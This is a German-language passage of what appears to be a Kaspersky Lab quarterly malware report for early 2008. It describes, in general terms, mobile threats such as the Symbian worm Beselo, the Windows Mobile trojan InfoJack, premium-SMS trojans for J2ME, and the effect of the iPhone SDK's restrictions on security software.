Für die Symbian-Plattform ist ein neuer Wurm aus einer ebenso neuen und eigenständigen Familie aufgetaucht. Bis dahin waren Kaspersky Lab nur die beiden Begründer dieses Genres bekannt. Dabei handelt es sich um den Bluetooth-Wurm Cabir und den MMS-Schädling ComWar, die jeweils auch in verschiedenen Modifikationen existieren.

Ende Dezember 2007 landete mit der Variante .y ein auf den ersten Blick weiterer ComWar-Klon in den Antiviren-Datenbanken von Kaspersky Lab. Als dieser im Januar 2008 jedoch im Traffic eines großen Mobilfunkanbieters auftauchte, war eine genauere Untersuchung des neuen Samples notwendig.

Eine vom finnischen Partner-Unternehmen F-Secure durchgeführte Analyse ergab, dass es sich hierbei um eine völlig neue Familie handelt, die nichts mit dem vor drei Jahren in Russland entwickelten ComWar gemein hat.

Der als Worm.SymbOSS.Beselo.a klassifizierte Wurm funktioniert ähnlich wie ComWar und ist typisch für Würmer dieser Art. Der Schädling verbreitet sich mittels infizierter SIS-Dateien, die per MMS und über Bluetooth versendet werden. Nach Download des Wurms versendet sich dieser an sämtliche im Adressbuch des Smartphones gespeicherten Kontakte und an alle via Bluetooth erreichbaren Geräte.

Das eigentlich Neue ist jedoch, dass der Wurm überhaupt existiert und zu einer neuen Familie mobiler Würmer gehört, die sich aktiv verbreiten. Es ist nicht ausgeschlossen, dass neue Modifikationen des Wurms ernstzunehmende lokale Epidemien verursachen. Das geschah beispielsweise im Frühling vergangenen Jahres, als in Valencia mehr als 115 000 Smartphones von einer spanischen ComWar-Modifikation infiziert wurden.

Windows Mobile

Das Interesse der Virenautoren an Windows Mobile hält sich bisher stark in Grenzen. Deshalb ist es schon eine Meldung wert, wenn ein neuer Schädling für dieses Betriebssystem erscheint. Die Entdeckung des Trojaners InfoJack.a Ende Februar 2008 ist aber auch aus anderen Gründe interessant.

InfoJack.a:

  1. attackiert Windows Mobile
  2. wurde in „freier Wildbahn“ entdeckt
  3. verbreitet sich in China
  4. stiehlt Informationen

Bei InfoJack.a handelt sich um den ersten Schädling für Windows Mobile, der in freier Wildbahn kursiert und zahlreiche Geräte infiziert hat. Er stammt von einer chinesischen Website und kommt als heimliche Beigabe zu verschiedenen legalen mobilen Programmen wie etwa Google Maps oder Spielesammlungen. Der Betreiber behauptet, keine illegalen Ziele verfolgt und die Daten der Website-Besucher nur gesammelt zu haben, um den Service zu verbessern und den Markt für mobile Anwendungen zu analysieren.

Gelangt der Trojaner ins System, versucht er den Mechanismus zu deaktivieren, der die Installation unsignierter Anwendungen verhindert. Nachdem sich dann das infizierte Smartphone mit dem Internet verbunden hat, übermittelt InfoJack.a private Daten, wie zum Beispiel die Seriennummer des Geräts, die Betriebssystemversion sowie installierte Anwendungen, an eine chinesische Website. Gleichzeitig kann der Schädling weitere Dateien auf das Gerät laden und diese starten, ohne dass der Anwenders es bemerkt.

Die Website wurde vermutlich nach Ermittlungen der chinesischen Behörden binnen einiger Tage offline genommen.

Was geschieht, wenn Cyberkriminelle ihr Augenmerk auf populäre Web-Services richten, hat dieser Quartalsbericht am Beispiel von Orkut bereits beschrieben. China ist bei der Entwicklung von Schadprogrammen zweifellos Weltklasse. Über 50 Prozent aller neuen Schadprogramme in den Antiviren-Datenbanken von Kaspersky Lab stammen derzeit aus China. Bis dato richteten sich die Attacken chinesische Hacker überwiegend gegen Online-Gamer. Der Fall InfoJack.a zeigt allerdings, dass die Virenschreiber auch weit verbreitete Epidemien mobiler Viren organisieren können.

China ist das erste Land, in dem mit Windows Mobile ausgestattete Geräte von einem trojanischen Programm befallen werden können. Möglicherweise hatten die Entwickler von InfoJack.a tatsächlich nichts Illegales im Sinn, der Grundstein für weitere Ideen war damit allerdings gelegt. Und es ist durchaus denkbar, dass sich tausende chinesische Hacker, die bisher PC-Viren entwickelt haben, davon inspirieren lassen.

J2ME

In den ersten drei Monaten des laufenden Jahres erschienen mit erschreckender Regelmäßigkeit neue Trojaner für die Java-Plattform J2ME, die praktisch auf jedem modernen Handy und nicht nur auf Smartphones läuft. Im Januar entdeckte Kaspersky Lab Smarm.b, im Februar Smarm.c und Swapi.a sowie im März SMSFree.d.

Alle Schädlinge wurden in Russland entdeckt und nutzen mit dem SMS-Versand an kostenpflichtige Telefonnummern eine einheitliche Methode, um Anwender um Geld zu erleichtern. Eine von Kaspersky Lab durchgeführte Untersuchung des SMS-Trojaners Viver im letzten Jahr hat gezeigt, dass sein Autor auf diese Weise innerhalb von nur drei Tagen 500 US-Dollar verdienen konnte. Ungeachtet solcher Vorfälle bieten russische Mobilfunkanbieter allen Inhabern von Premium-Nummern nach wie vor ein hohes Maß an Anonymität. Das führt dazu, dass die Virenautoren straffrei ausgehen. Das wird dadurch belegt, dass immer neue Schadprogramm-Varianten auftreten und auch keine Nachrichten über die Verhaftung von Virenautoren erscheinen.

Neben den oben erwähnten Trojanern für J2ME versenden auch die in Python programmierten Smartphone-Schädlinge Flocker.d und Flocker.e kostenpflichtige SMS-Nachrichten. Beide wurden im Januar 2008 entdeckt und verbreiten sich über bekannte Webseiten, die Software für mobile Geräte anbieten. Damit gehen sie genauso vor wie der bereits beschriebene Trojaner InfoJack.a. Die Smartphone-Schädlinge geben sich entweder als nützliche Tools aus oder aber sind in solchen enthalten.

iPhone

In der Übersicht aktueller IT-Bedrohungen für mobile Geräte darf ein Ereignis natürlich nicht fehlen: die Veröffentlichung des SDK (Software Development Kit) für das iPhone im März dieses Jahres.

Im letzten Jahresbericht hatte Kaspersky Lab prognostiziert, dass mit dem SDK auch eine Vielzahl von Schädlingen für das iPhone erscheinen würde. Allerdings sind die Möglichkeiten des offenen Apple-SDK sehr begrenzt.

Der Hersteller beschritt hier denselben Weg wie Symbian. Das Modell zur Entwicklung und Verbreitung von Programmen für das iPhone basiert auf „signierten“ Anwendungen.

Der Nutzungsvertrag des SDK legt grundlegende Beschränkungen fest: „Mit der entwickelten Anwendung darf kein Code herunter geladen und gestartet werden, der nicht von dem von Apple publizierten API oder dem integrierten Interpreter ausgeführt wird. Die Anwendung darf keinen anderen geladenen Code installieren oder starten, unter anderem keine Architektur mit Plugins verwenden sowie keine fremden Programmschnittstellen und andere Subsysteme aufrufen.“

Derartige Beschränkungen machen nicht nur Virenschreibern das Leben schwer, sondern dem iPhone auch die Nutzung vieler Anwendungen unmöglich. Dazu zählen beliebte Tools wie Firefox, Opera, zahlreiche Spiele, IM-Clients und vielen andere Software, welche die Möglichkeiten des Geräts entscheidend erweitern kann.

In den ersten vier Tagen nach seiner Veröffentlichung wurde das SDK mehr als 100 000 Mal herunter geladen. Die Vermutung lag nahe, dass die Zahl der mit Hilfe des SDK entwickelten iPhone-Anwendungen nun rapide ansteigen würden. Doch nichts dergleichen geschah.

Apple hat das Versprechen, ein SDK für das iPhone herauszugeben, zwar formal erfüllt. Allerdings sind damit in der Praxis noch nicht einmal die Vorraussetzungen gegeben, legale Software für das Gerät zu entwickeln. Es gibt einfach zu viele Beschränkungen und zahlreiche Funktionen sind im SDK nicht freigegeben.

Eine weitere entscheidende Beschränkung betrifft die Verteilung der Software. SDK-Anwendungen dürfen ausschließlich über das E-Magazin von Apple verbreitet werden, wobei sich beispielsweise die Anzahl der Verkäufer mengenmäßig oder geografisch auf die USA eingrenzen lässt.

Unter diesen Umständen ist es für Kaspersky Lab nach wie vor unmöglich, ein Antiviren-Produkt für das iPhone auf den Markt zu bringen. Das Problem ist dabei keineswegs technischer Natur.

Das iPhone wird unterdessen massenhaft gehackt. Laut Schätzungen sind zwischen 25 und 50 Prozent der verkauften Telefone von Angriffen betroffen und gleichzeitig auch dem Risiko einer Infizierung mit beliebigen anderen iPhone-Schadprogrammen ausgesetzt. Viele iPhone-User laden Dateien von Dutzenden inoffizieller Repositorys auf ihre Geräte und können daher nicht den offiziellen technischen Support in Anspruch nehmen. Auch Kaspersky Lab kann ihnen keinen Antiviren-Schutz zur Verfügung stellen.

Bald schon wird die Zahl dieser Anwender ebenso hoch sein wie die der Smartphone-User unter Symbian im Jahr 2004, als der Wurm Cabir auf den Plan trat.

Fazit

Die Ergebnisse des ersten Quartals 2008 zeigen, dass Virenschreiber erstmals seit längerer Zeit wieder neue Techniken einsetzen. Noch im letzten Jahr stellte Kaspersky Lab fest, dass Cyberkriminelle ihre Malware wie am Fließband produzieren. Trotz ihrer großen Anzahl handelte es sich dabei um primitive Einheitsschädlinge, deren Produzenten nicht einmal den Versuch unternahmen, innovativere Techniken zu verwenden. Die Virenschreiber hatten sich auf die Fließband-Strategie spezialisiert, da sich zu dieser Zeit selbst mit alten und bekannten Schädlingen gute Erträge erzielen ließen, sofern sie in großem Maßstab eingesetzt wurden.

Inzwischen hat sich der Trend eindeutig geändert, was sich allein schon an der Entwicklung des ersten schädlichen Bootkits erkennen lässt. Die Virenschreiber verwenden auch immer häufiger verschiedene Methoden zur Dateiinfizierung und bedienen sich dabei unter anderem komplexer polymorpher Verfahren. So wurden beispielsweise Schadprogramme entdeckt, die über eine signaturbasierte Erkennungsmethode Antiviren-Programme auf dem Computer aufspüren, um sie anschließend zu löschen oder zu blockieren. Früher beschränkten sich die Virenautoren dazu noch auf die Suche nach Dateinamen.

Heute legen Cyberkriminelle alte Verfahren neu auf und setzen sie in einem veränderten Umfeld wieder ein. Der Wettstreit zwischen Virenprogrammierern und Herstellern von Antiviren-Software verlagert sich zunehmen von der Software- auf die Hardware-Ebene.

Aus den Ereignissen des ersten Quartals 2008 lässt sich noch kein eindeutiger Trend ablesen. Die in diesem Zeitraum registrierten Malware-Probleme könnten aber schon sehr bald die gesamte IT-Sicherheitsindustrie stark beeinflussen.

Ähnliche Beiträge

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.